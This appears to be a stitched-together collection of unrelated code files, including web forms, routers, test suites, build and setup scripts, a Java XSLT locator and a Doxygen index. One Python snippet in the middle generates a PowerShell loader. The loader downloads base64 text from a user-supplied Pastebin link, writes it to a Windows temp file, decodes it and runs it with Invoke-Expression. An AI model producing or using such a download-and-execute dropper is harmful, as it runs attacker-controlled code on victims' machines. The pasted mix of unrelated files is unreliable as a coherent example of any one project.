<input type="text" id="email" name="email" placeholder="Enter your email"><br>
<label for="password">Password:</label><br>
<input type="password" id="password" name="password" placeholder="Enter your password"><br><br>
<input type="submit" value="Sign Up">
</form>
</body>
</html> |
<filename>lang/py/rfc/06/page.py
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# 验证闭包在惰性求值时的作用
try:
from urllib import urlopen
except:
from urllib.request import urlopen
def page(url):
def get():
return urlopen(url).read()
return get
|
require 'rails_helper'
RSpec.describe DownloadsController, type: :controller do
describe '#index' do
subject { get :index }
it { expect(response.status).to eq(200) }
it { is_expected.to render_template(:index) }
it_behaves_like 'disallows untrusted ips'
end
end
|
<filename>src/app/app.router.ts
import { ModuleWithProviders } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';
import AppComponent from './app.component';
import MainPageComponent from './main-page/main-page.component';
import TrendingComponent from './trending/trending.component';
import SignInComponent from './sign-in/sign-in.component';
import RegisterComponent from './register/register.component';
import NewsPageComponent from './news-page/news-page.component';
import SettingsComponent from './settings/settings.component';
import ManageComponent from './manage/manage.component';
import PostsComponent from './manage/posts/posts.component';
import AddPostComponent from './manage/add-post/add-post.component';
import EditPostComponent from './manage/edit-post/edit-post.component';
import CategoriesComponent from './manage/categories/categories.component';
import AddTagComponent from './manage/add-tag/add-tag.component';
import CommentsViewComponent from './manage/comments-view/comments-view.component';
import UsersComponent from './manage/users/users.component';
export const router: Routes = [
{ path: '', redirectTo: '/', pathMatch: 'full'},
{ path: '', component: MainPageComponent},
{ path: 'trending', component: TrendingComponent},
{ path: 'sign-in', component: SignInComponent},
{ path: 'register', component: RegisterComponent},
{ path: 'news/:id/:slug', component: NewsPageComponent},
{ path: 'manage', component: ManageComponent,
children: [
{ path: '', redirectTo: 'posts', pathMatch: 'full'},
{ path: 'posts', component: PostsComponent},
{ path: 'edit-post/:id', component: EditPostComponent},
{ path: 'add-post', component: AddPostComponent},
{ path: 'tags', component: CategoriesComponent},
{ path: 'add-tag', component: AddTagComponent},
{ path: 'comments', component: CommentsViewComponent},
{ path: 'users', component: UsersComponent},
]},
{ path: 'settings', component: SettingsComponent}
];
export const routes: ModuleWithProviders = RouterModule.forRoot(router);
|
#!/usr/bin/env bash
set -e
# setting up colors
BLU='\033[0;34m'
YLW='\033[0;33m'
GRN='\033[0;32m'
RED='\033[0;31m'
NOC='\033[0m' # No Color
echo_info() {
printf "\n${BLU}%s${NOC}" "$1"
}
echo_step() {
printf "\n${BLU}>>>>>>> %s${NOC}\n" "$1"
}
echo_sub_step() {
printf "\n${BLU}>>> %s${NOC}\n" "$1"
}
echo_step_completed() {
printf "${GRN} [✔]${NOC}"
}
echo_success() {
printf "\n${GRN}%s${NOC}\n" "$1"
}
echo_warn() {
printf "\n${YLW}%s${NOC}" "$1"
}
echo_error() {
printf "\n${RED}%s${NOC}" "$1"
exit 1
}
# ------------------------------
projectdir="$(cd "$(dirname "${BASH_SOURCE[0]}")"/../.. && pwd)"
# get the build environment variables from the special build.vars target in the main makefile
eval $(make --no-print-directory -C ${projectdir} build.vars)
SAFEHOSTARCH="${SAFEHOSTARCH:-amd64}"
BUILD_IMAGE="${BUILD_REGISTRY}/${PROJECT_NAME}-${SAFEHOSTARCH}"
helm_tag="$(cat ${projectdir}/_output/version)"
CROSSPLANE_IMAGE="upbound/${PROJECT_NAME}:${helm_tag}"
K8S_CLUSTER="${K8S_CLUSTER:-${BUILD_REGISTRY}-inttests}"
CROSSPLANE_NAMESPACE="crossplane-system"
# cleanup on exit
if [ "$skipcleanup" != true ]; then
function cleanup() {
echo_step "Cleaning up..."
export KUBECONFIG=
"${KIND}" delete cluster --name="${K8S_CLUSTER}"
}
trap cleanup EXIT
fi
echo_step "creating k8s cluster using kind"
"${KIND}" create cluster --name="${K8S_CLUSTER}"
# tag crossplane image and load it to kind cluster
docker tag "${BUILD_IMAGE}" "${CROSSPLANE_IMAGE}"
"${KIND}" load docker-image "${CROSSPLANE_IMAGE}" --name="${K8S_CLUSTER}"
echo_step "installing helm package(s) into \"${CROSSPLANE_NAMESPACE}\" namespace"
# We removed helm.mk since we don't need/want to publish helm charts. However,
# we lost templating functionality from values.yaml.tmpl which is handled with
# the following lines instead.
cp "${projectdir}/cluster/charts/${PROJECT_NAME}/values.yaml.tmpl" "${projectdir}/cluster/charts/${PROJECT_NAME}/values.yaml"
sed -i -e "s|%%VERSION%%|${helm_tag}|g" "${projectdir}/cluster/charts/${PROJECT_NAME}/values.yaml"
"${KUBECTL}" create ns "${CROSSPLANE_NAMESPACE}"
"${HELM3}" install "${PROJECT_NAME}" --namespace "${CROSSPLANE_NAMESPACE}" "${projectdir}/cluster/charts/${PROJECT_NAME}" --set replicas=2,rbacManager.replicas=2,image.pullPolicy=Never,imagePullSecrets=''
echo_step "waiting for deployment ${PROJECT_NAME} rollout to finish"
"${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" rollout status "deploy/${PROJECT_NAME}" --timeout=2m
echo_step "wait until the pods are up and running"
"${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" wait --for=condition=Ready pods --all --timeout=1m
# ----------- integration tests
echo_step "------------------------------ INTEGRATION TESTS"
echo
echo_step "check for necessary deployment statuses"
echo
echo -------- deployments
"${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" get deployments
MUST_HAVE_DEPLOYMENTS="crossplane crossplane-rbac-manager"
for name in $MUST_HAVE_DEPLOYMENTS; do
echo_sub_step "inspecting deployment '${name}'"
dep_stat=$("${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" get deployments/"${name}")
echo_info "check if is deployed"
if $(echo "$dep_stat" | grep -iq 'No resources found'); then
echo "is not deployed"
exit -1
else
echo_step_completed
fi
echo_info "check if is ready"
IFS='/' read -ra ready_status_parts <<<"$(echo "$dep_stat" | awk ' FNR > 1 {print $2}')"
if ((${ready_status_parts[0]} < ${ready_status_parts[1]})); then
echo "is not Ready"
exit -1
else
echo_step_completed
fi
echo
done
echo_step "check for pods statuses"
for ((i = 1; i <= 5; i++)); do
echo_sub_step "pod check #$i"
echo
echo "-------- pods"
pods=$("${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" get pods)
echo "$pods"
while read -r pod_stat; do
name=$(echo "$pod_stat" | awk '{print $1}')
echo_sub_step "inspecting pod '${name}'"
echo_info "check if is ready"
IFS='/' read -ra ready_status_parts <<<"$(echo "$pod_stat" | awk '{print $2}')"
if ((${ready_status_parts[0]} < ${ready_status_parts[1]})); then
echo_error "is not ready"
exit -1
else
echo_step_completed
fi
echo_info "check if is running"
if $(echo "$pod_stat" | awk '{print $3}' | grep -ivq 'Running'); then
echo_error "is not running"
exit -1
else
echo_step_completed
fi
echo_info "check if has restarts"
if (($(echo "$pod_stat" | awk '{print $4}') > 0)); then
echo_error "has restarts"
exit -1
else
echo_step_completed
fi
echo
done <<<"$(echo "$pods" | awk 'FNR>1')"
sleep 5
done
echo_success "Integration tests succeeded!"
|
<filename>src/router.js
import React from 'react';
import { Router, Route, Switch } from 'dva/router';
import dynamic from 'dva/dynamic';
import IndexPage from './routes/IndexPage';
function RouterConfig({ app, history }) {
return (
<Router history={history}>
<Switch>
<Route path="/" exact component={IndexPage} />
<Route path='/home' exact component={dynamic({
app,
component: () => import('./routes/Home'),
models: () => [
import('./models/home'),
],
})} />
</Switch>
</Router>
);
}
export default RouterConfig;
|
<gh_stars>0
/*
* Copyright © 2019 <NAME>, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
import React from 'react';
import data from './sample_response';
import {
parseRelations,
makeTargetNodes,
} from 'components/FieldLevelLineage/v2/Context/FllContextHelper';
interface INode {
id: string;
name: string;
group: number;
}
const FllContext = React.createContext({});
function getFieldsAndLinks(d) {
const incoming = parseRelations(d.entityId.namespace, d.incoming);
const outgoing = parseRelations(d.entityId.namespace, d.outgoing, false);
const causeTables = incoming.tables;
const impactTables = outgoing.tables;
const nodes = incoming.relNodes.concat(outgoing.relNodes);
const links = incoming.relLinks.concat(outgoing.relLinks);
return { causeTables, impactTables, nodes, links };
}
export function Provider({ children }) {
const parsedRes = getFieldsAndLinks(data);
const defaultState = {
target: data.entityId.dataset,
targetFields: makeTargetNodes(data.entityId.dataset, data.fields) as INode[],
nodes: parsedRes.nodes,
links: parsedRes.links,
causeSets: parsedRes.causeTables,
impactSets: parsedRes.impactTables,
activeField: null,
numTables: 4,
firstCause: 1,
firstImpact: 1,
firstField: 1,
};
return <FllContext.Provider value={defaultState}>{children}</FllContext.Provider>;
}
export function Consumer({ children }) {
return <FllContext.Consumer>{children}</FllContext.Consumer>;
}
|
onedata = str('&wc = new-object System.Net.WebClient\n\n$wc.DownloadString("http://pastebin.com/raw/MLpLWsgW") | out-file c:\Windows\\temp\henneko.txt\n\n$File = Get-Content -Path "C:\Windows\Temp\henneko.txt"\n\nWrite-Host $File\n\n$enc = [System.Text.Encoding]::UTF8\n$string = $enc.GetString([System.Convert]::FromBase64String($File))\n\nWrite-Host $string\n\nInvoke-Expression -Command "$string"')
link = str(input("Link a usar de pastebin en base 64: "))
print (onedata.replace("http://pastebin.com/raw/MLpLWsgW", link))
import sys
sys.stdout=open("hennekogetdepastepython.ps1","w")
print (onedata.replace("http://pastebin.com/raw/MLpLWsgW", link))
sys.stdout.close()
f= open("hennekogetdepastepython.ps1","w+")
f.write(onedata.replace("http://pastebin.com/raw/MLpLWsgW", link))
f.close() |
#https://medium.com/@xpl/protecting-python-sources-using-cython-dcd940bb188e
import setuptools # important
from distutils.core import Extension, setup
from Cython.Build import cythonize
from Cython.Distutils import build_ext
#cimport numpy as np
import numpy
# define an extension that will be cythonized and compiled
extensions = [
Extension(
name="gff",
sources=["GraphTree.pyx"],
# libraries=[],
#library_dirs=["/usr/local/lib/","/usr/lib"],
language="c",
include_dirs=[numpy.get_include()]
),
#and other extension
# Extension(name="csegmentation", sources=["CSegmentation.pyx"],
# library_dirs=["/usr/local/lib/","/usr/lib"],
# extra_compile_args = ["-I/usr/include/igraph -L/usr/include/lib -ligraph"],
# extra_link_args = ["-I/usr/include/igraph -L/usr/include/lib -ligraph"],
# language="c++"),
]
setup(
name = 'GFF',
cmdclass = {'build_ext': build_ext},
ext_modules=cythonize(extensions)
)
|
#!/usr/bin/env bash
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Set-up the dependencies necessary to build and run Redex on Ubuntu 16.04
# Xenial, using APT for software management.
# Exit on any command failing
set -e
# Root directory of repository
ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null 2>&1 && pwd)"
# Temporary directory for toolchain sources. Build artifacts will be
# installed to /usr/local.
TMP=$(mktemp -d 2>/dev/null)
trap 'rm -r $TMP' EXIT
BOOST_DEB_UBUNTU_PKGS="libboost-filesystem-dev
libboost-iostreams-dev
libboost-program-options-dev
libboost-regex-dev
libboost-system-dev
libboost-thread-dev"
function install_python36_from_source {
pushd "$TMP"
wget https://www.python.org/ftp/python/3.6.10/Python-3.6.10.tgz
tar -xvf Python-3.6.10.tgz
pushd Python-3.6.10
./configure
make && make install
}
function install_boost_from_source {
pushd "$TMP"
"$ROOT"/get_boost.sh
}
function install_from_apt {
PKGS="autoconf
autoconf-archive
automake
binutils-dev
bzip2
ca-certificates
g++
libiberty-dev
libjemalloc-dev
libjsoncpp-dev
liblz4-dev
liblzma-dev
libtool
make
wget
zlib1g-dev $*"
apt-get update
apt-get install --no-install-recommends -y ${PKGS}
}
function handle_debian {
case $1 in
[1-9])
echo "Unsupported Debian version $1"
exit 1
;;
10)
install_from_apt python3
install_boost_from_source
;;
*)
install_from_apt ${BOOST_DEB_UBUNTU_PKGS} python3
;;
esac
}
function handle_ubuntu {
case $1 in
16*)
install_from_apt
install_python36_from_source
install_boost_from_source
;;
1[7-9]*)
install_from_apt python3
install_boost_from_source
;;
2*)
install_from_apt ${BOOST_DEB_UBUNTU_PKGS} python3
;;
*)
echo "Unsupported Ubuntu version $1"
exit 1
;;
esac
}
# Read ID and VERSION_ID from /etc/os-release.
declare $(grep -E '^(ID|VERSION_ID)=' /etc/os-release | xargs)
case $ID in
ubuntu)
handle_ubuntu "$VERSION_ID"
;;
debian)
handle_debian "$VERSION_ID"
;;
*)
echo "Unsupported OS $ID - $VERSION_ID"
exit 1
esac
|
import { Point } from './AffinaMatrix';
export default class BoundaryPlate {
x: number;
y: number;
width: number;
height: number;
gridSize: number;
pixelSizeX: number;
pixelSizeY: number;
centerX: number;
centerY: number;
constructor(x: number, y: number, width: number, height: number, gridSize: number) {
this.x = x;
this.y = y;
this.width = width;
this.height = height;
this.gridSize = gridSize;
this.pixelSizeX = width / gridSize;
this.pixelSizeY = height / gridSize;
this.centerX = x + width / 2;
this.centerY = y + height / 2;
}
setGridSize(size: number) {
if (this.gridSize === size) return;
this.gridSize = size;
this.pixelSizeX = this.width / this.gridSize;
this.pixelSizeY = this.height / this.gridSize;
}
draw(ctx: CanvasRenderingContext2D): void {
this.drawGrid(ctx);
this.drawAxis(ctx);
}
private drawGrid(ctx: CanvasRenderingContext2D) {
ctx.save();
ctx.strokeStyle = '#aaa';
const { x, y, width, height } = this;
for (let i = 0; i < this.gridSize; i++) {
for (let j = 0; j < this.gridSize; j++) {
ctx.strokeRect(this.x + i * this.pixelSizeX, this.y + j * this.pixelSizeY, this.pixelSizeX, this.pixelSizeY);
}
}
ctx.restore();
}
private drawAxis(ctx: CanvasRenderingContext2D) {
ctx.save();
ctx.strokeStyle = '#000';
const { x, y, width, height } = this;
const arrowHeight = this.pixelSizeY / 1.5;
const arrowWidth = this.pixelSizeX / 4;
// X
ctx.beginPath();
ctx.moveTo(x, y + height / 2);
ctx.lineTo(x + width, y + height / 2);
ctx.moveTo(x + width, y + height / 2);
ctx.lineTo(x + width - arrowHeight, y + height / 2 - arrowWidth);
ctx.moveTo(x + width, y + height / 2);
ctx.lineTo(x + width - arrowHeight, y + height / 2 + arrowWidth);
// Y
ctx.moveTo(x + width / 2, y);
ctx.lineTo(x + width / 2, y + height);
ctx.moveTo(x + width / 2, y);
ctx.lineTo(x + width / 2 - arrowWidth, y + arrowHeight);
ctx.moveTo(x + width / 2, y);
ctx.lineTo(x + width / 2 + arrowWidth, y + arrowHeight);
ctx.stroke();
ctx.restore();
}
getCoord(p: Point): Point {
return new Point(
this.centerX + (p.x * this.pixelSizeX),
this.centerY + (-p.y * this.pixelSizeY)
);
}
drawLine(ctx: CanvasRenderingContext2D, xFrom: number, yFrom: number, xTo: number, yTo: number) {
const xy1: Point = this.getCoord(new Point(xFrom, yFrom));
const xy2: Point = this.getCoord(new Point(xTo, yTo));
ctx.beginPath();
ctx.moveTo(xy1.x, xy1.y);
ctx.lineTo(xy2.x, xy2.y);
ctx.stroke();
}
drawParalelogram(ctx: CanvasRenderingContext2D, t: Paralelogram) {
const a: Point = this.getCoord(t.p1);
const b: Point = this.getCoord(t.p2);
const c: Point = this.getCoord(t.p3);
const d: Point = this.getCoord(t.p4);
ctx.beginPath();
ctx.moveTo(a.x, a.y);
ctx.lineTo(b.x, b.y);
ctx.lineTo(c.x, c.y);
ctx.lineTo(d.x, d.y);
ctx.lineTo(a.x, a.y);
ctx.stroke();
}
}
export class Paralelogram {
p1: Point;
p2: Point;
p3: Point;
p4: Point;
constructor(p1: Point, p2: Point, p3: Point, p4: Point) {
this.p1 = p1;
this.p2 = p2;
this.p3 = p3;
this.p4 = p4;
}
}
|
#!/bin/bash
# Runs gitlab-ci locally
# For some reason there isn't a convenient command for running
# all jobs in the proper order (build -> test), hence this script.
set -e
for t in buster focal stretch bionic bullseye
do
gitlab-ci-multi-runner exec shell build:$t && gitlab-ci-multi-runner exec shell test:$t || (echo "stop @ $t, exit=$?" ; exit 1)
done
|
<gh_stars>0
package org.hisp.dhis.importexport.xml;
/*
* Copyright (c) 2004-2005, University of Oslo
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* * Neither the name of the <ORGANIZATION> nor the names of its contributors may
* be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
import java.io.IOException;
import java.io.InputStream;
import org.amplecode.staxwax.framework.XPathFilter;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.hisp.dhis.external.location.LocationManager;
import org.hisp.dhis.external.location.LocationManagerException;
import org.hisp.dhis.importexport.ImportException;
import org.springframework.core.io.ClassPathResource;
import org.w3c.dom.Node;
/**
* An XSLT locator based on the dhis LocationManager
*
* It depends on a simple XML transformers configration file which maps tags to
* stylesheets.
*
* @author bobj
* @version created 30-Apr-2010
*/
public class LocManagerXSLTLocator
implements XSLTLocator
{
private static final Log log = LogFactory.getLog( LocManagerXSLTLocator.class );
private static final String TRANSFORMER_MAP = "transform/transforms.xml";
private LocationManager locationManager;
public void setLocationManager( LocationManager locationManager )
{
this.locationManager = locationManager;
}
@Override
public InputStream getTransformerByTag( String identifier )
throws ImportException
{
Node transformerNode = null;
String xpath = "/transforms/transform[@tag='" + identifier + "']/xslt";
log.debug( "xpath search: " + xpath );
// ---------------------------------------------------------------------
// Search file system
// ---------------------------------------------------------------------
try
{
transformerNode = XPathFilter.findNode( locationManager.getInputStream( TRANSFORMER_MAP ), xpath );
}
catch ( LocationManagerException ex )
{
// Not found, proceed to search in classpath
}
if ( transformerNode != null )
{
log.info( "Loading transformer from file system: " + transformerNode.getTextContent() );
try
{
return locationManager.getInputStream( "transform/" + transformerNode.getTextContent() );
}
catch ( LocationManagerException ex )
{
throw new ImportException( "Transformer mapped for format but could not be found on file system: " + transformerNode.getTextContent() );
}
}
// ---------------------------------------------------------------------
// Search classpath
// ---------------------------------------------------------------------
try
{
transformerNode = XPathFilter.findNode( new ClassPathResource( TRANSFORMER_MAP ).getInputStream(), xpath );
log.info( "Loading transformer from classpath: " + transformerNode.getTextContent() );
return new ClassPathResource( "transform/" + transformerNode.getTextContent() ).getInputStream();
}
catch ( IOException ex )
{
throw new ImportException( "No transformer configured for this format: " + identifier );
}
}
}
|
import '@testing-library/jest-dom/extend-expect';
import { createForm } from 'felte';
import type { ValidationFunction } from '@felte/common';
import { validateSchema, validator } from '../src';
import type { ValidatorConfig } from '../src';
import * as zod from 'zod';
import { get } from 'svelte/store';
describe('Validator zod', () => {
test('correctly validates', async () => {
const schema = zod.object({
email: zod.string().email().nonempty(),
password: zod.string().nonempty(),
});
const mockData = {
email: '',
password: '',
};
const { validate, errors, data } = createForm({
initialValues: mockData,
onSubmit: jest.fn(),
validate: validateSchema(schema),
});
await validate();
expect(get(data)).toEqual(mockData);
expect(get(errors)).toEqual({
email: 'Should be at least 1 characters',
password: '<PASSWORD>',
});
data.set({
email: '<EMAIL>',
password: '<PASSWORD>',
});
await validate();
expect(get(errors)).toEqual({
email: null,
password: null,
});
});
test('correctly validates deep form', async () => {
const schema = zod.object({
account: zod.object({
email: zod.string().email().nonempty(),
password: zod.string().nonempty(),
}),
});
const mockData = {
account: {
email: '',
password: '',
},
};
const { validate, errors, data } = createForm({
initialValues: mockData,
onSubmit: jest.fn(),
validate: validateSchema(schema),
});
await validate();
expect(get(data)).toEqual(mockData);
expect(get(errors)).toEqual({
account: {
email: 'Should be at least 1 characters',
password: '<PASSWORD>',
},
});
data.set({
account: {
email: '<EMAIL>',
password: '<PASSWORD>',
},
});
await validate();
expect(get(errors)).toEqual({
account: {
email: null,
password: <PASSWORD>,
},
});
});
test('correctly validates with extend', async () => {
const schema = zod.object({
email: zod.string().email().nonempty(),
password: zod.string().nonempty(),
});
const mockData = {
email: '',
password: '',
};
const { validate, errors, data } = createForm<
typeof mockData,
ValidatorConfig
>({
initialValues: mockData,
onSubmit: jest.fn(),
extend: validator,
validateSchema: schema,
});
await validate();
expect(get(data)).toEqual(mockData);
expect(get(errors)).toEqual({
email: 'Should be at least 1 characters',
password: '<PASSWORD>',
});
data.set({
email: '<EMAIL>',
password: '<PASSWORD>',
});
await validate();
expect(get(errors)).toEqual({
email: null,
password: null,
});
});
test('correctly validates deep form with extend', async () => {
const schema = zod.object({
account: zod.object({
email: zod.string().email().nonempty(),
password: zod.string().nonempty(),
}),
});
const mockData = {
account: {
email: '',
password: '',
},
};
const { validate, errors, data } = createForm<
typeof mockData,
ValidatorConfig
>({
initialValues: mockData,
onSubmit: jest.fn(),
extend: validator,
validateSchema: schema,
});
await validate();
expect(get(data)).toEqual(mockData);
expect(get(errors)).toEqual({
account: {
email: 'Should be at least 1 characters',
password: '<PASSWORD>',
},
});
data.set({
account: {
email: '<EMAIL>',
password: '<PASSWORD>',
},
});
await validate();
expect(get(errors)).toEqual({
account: {
email: null,
password: <PASSWORD>,
},
});
});
test('correctly validates deep form with other validate', async () => {
const schema = zod.object({
account: zod.object({
email: zod.string().email().nonempty(),
password: zod.string().nonempty(),
}),
});
const mockData = {
account: {
email: '',
password: '',
},
};
const { validate, errors, data } = createForm<
typeof mockData,
ValidatorConfig
>({
initialValues: mockData,
onSubmit: jest.fn(),
extend: validator,
validateSchema: schema,
validate: jest.fn(() => ({
account: {
email: 'not an email',
},
})) as ValidationFunction<any>,
});
await validate();
expect(get(data)).toEqual(mockData);
expect(get(errors)).toEqual({
account: {
email: ['not an email', 'Should be at least 1 characters'],
password: '<PASSWORD>',
},
});
data.set({
account: {
email: '<EMAIL>',
password: '<PASSWORD>',
},
});
await validate();
expect(get(errors)).toEqual({
account: {
email: 'not an email',
password: <PASSWORD>,
},
});
});
});
|
def group_similar_items(list):
grouped_items = {}
for item in list:
if item in grouped_items:
grouped_items[item] += 1
else:
grouped_items[item] = 1
print(grouped_items)
group_similar_items(["dog", "cat", "cat", "fox", "dog", "elephant"])
# Output: {'dog': 2, 'cat': 2, 'fox': 1, 'elephant': 1} |
#!/bin/bash
[ -f $HOME/create-daml-app/target/create-daml-app.dar ] && echo "done"
|
<reponame>muthukumaravel7/armnn
var NAVTREEINDEX46 =
{
"classarmnn_1_1profiling_1_1_command_handler.xhtml#a5f937b7610842eb70d0376221da7bb07":[7,0,0,2,5,1],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#a602f1b64401712a87c2ef276f469368d":[7,0,0,2,5,0],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#aa2a07b9715323faee8cd53a623f25c7f":[7,0,0,2,5,4],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#ad201152b05beda61e51e3594ff07c8fe":[7,0,0,2,5,2],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#ad6feb3bc1f64bb41467da55d30e9403f":[7,0,0,2,5,3],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#af5f886492fa5da4ff3cde1769e9da2cb":[7,0,0,2,5,5],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml":[7,0,0,2,6],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#a05aaf089b3b02e13bc728e2c8c94cb4e":[7,0,0,2,6,1],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#a17b980d48f35a31c27a227e8ceae5402":[7,0,0,2,6,3],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#a52df705001d502e24a079bd8e0c1e956":[7,0,0,2,6,2],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#a7a9568e40773e80ab38c1a7dac4e7089":[7,0,0,2,6,4],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#ad88cf21899e5a0ee2d803eabf3f5dd04":[7,0,0,2,6,0],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#aee5d34e255ea616c6b4d6877eb3c9fad":[7,0,0,2,6,5],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml":[7,0,0,2,8],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a17b980d48f35a31c27a227e8ceae5402":[7,0,0,2,8,2],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a1d325215074dcfbf8ba4fdabb105a7ee":[7,0,0,2,8,7],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a4ddaee99a232d0d24005b9919b89ca49":[7,0,0,2,8,4],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a52df705001d502e24a079bd8e0c1e956":[7,0,0,2,8,1],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a56ffeb7b5ba6afe9b338c9fc77c0fdf0":[7,0,0,2,8,5],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a60f4b935c8ceb7bed8f4f44f1239719e":[7,0,0,2,8,0],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a66321e43e3e160eac1c7ca8680c2891b":[7,0,0,2,8,9],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a6679b11d54cda7d1f2f36f000f6b3398":[7,0,0,2,8,6],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a7a9568e40773e80ab38c1a7dac4e7089":[7,0,0,2,8,3],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a94b228ec5f9dab0a70836be60d0e6ba4":[7,0,0,2,8,8],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml":[7,0,0,2,9],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml#a46f9edb3e365423b93373629e9a13509":[7,0,0,2,9,0],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml#a7875d60ac5ca76c70f599367ec61261a":[7,0,0,2,9,2],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml#ab421312295ae76edb4a540900d96103b":[7,0,0,2,9,1],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml#ae56042d93e16ea2c1e99233fc0451d51":[7,0,0,2,9,3],
"classarmnn_1_1profiling_1_1_connection_acknowledged_command_handler.xhtml":[7,0,0,2,10],
"classarmnn_1_1profiling_1_1_connection_acknowledged_command_handler.xhtml#a0a4b0531c573c4474c241b778c5f5897":[7,0,0,2,10,1],
"classarmnn_1_1profiling_1_1_connection_acknowledged_command_handler.xhtml#a9552a2b823cb596825478b0bee2be8e4":[7,0,0,2,10,0],
"classarmnn_1_1profiling_1_1_counter.xhtml":[7,0,0,2,11],
"classarmnn_1_1profiling_1_1_counter.xhtml#a3b95c70c6d9c60fe7b25a4fa9bf20ea0":[7,0,0,2,11,3],
"classarmnn_1_1profiling_1_1_counter.xhtml#a58ce26007b307f7e6200e4af7fbf601d":[7,0,0,2,11,10],
"classarmnn_1_1profiling_1_1_counter.xhtml#a599a6c52925234fe9426a1faff288151":[7,0,0,2,11,0],
"classarmnn_1_1profiling_1_1_counter.xhtml#a5a9bff456a4766d40e907c77bee43efe":[7,0,0,2,11,1],
"classarmnn_1_1profiling_1_1_counter.xhtml#a5edaa2326b1410fae32c5253ed0188d8":[7,0,0,2,11,4],
"classarmnn_1_1profiling_1_1_counter.xhtml#a69719c180aafcdf5a25f81a851c74809":[7,0,0,2,11,6],
"classarmnn_1_1profiling_1_1_counter.xhtml#a7aa5f39e2eddecaa9b1b5730c0481b11":[7,0,0,2,11,2],
"classarmnn_1_1profiling_1_1_counter.xhtml#a84079a1f364c37c59230bc52332d8d19":[7,0,0,2,11,11],
"classarmnn_1_1profiling_1_1_counter.xhtml#ab13844df5477a9ab8f13069e3d8abad6":[7,0,0,2,11,9],
"classarmnn_1_1profiling_1_1_counter.xhtml#ad5399f5bba038956f1fbde241bc44096":[7,0,0,2,11,8],
"classarmnn_1_1profiling_1_1_counter.xhtml#ae4a480dde76c2182ba3611d43cc0d109":[7,0,0,2,11,7],
"classarmnn_1_1profiling_1_1_counter.xhtml#af734583ef63236e643f64bc6f3f93c3d":[7,0,0,2,11,5],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml":[7,0,0,2,12],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a0fc9b7d9a197eef913fddc3f2e4e8b74":[7,0,0,2,12,0],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a161604d904508d5b86b459c2c2ace4be":[7,0,0,2,12,24],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a220a83a3433b6da68d41efe07c39b552":[7,0,0,2,12,22],
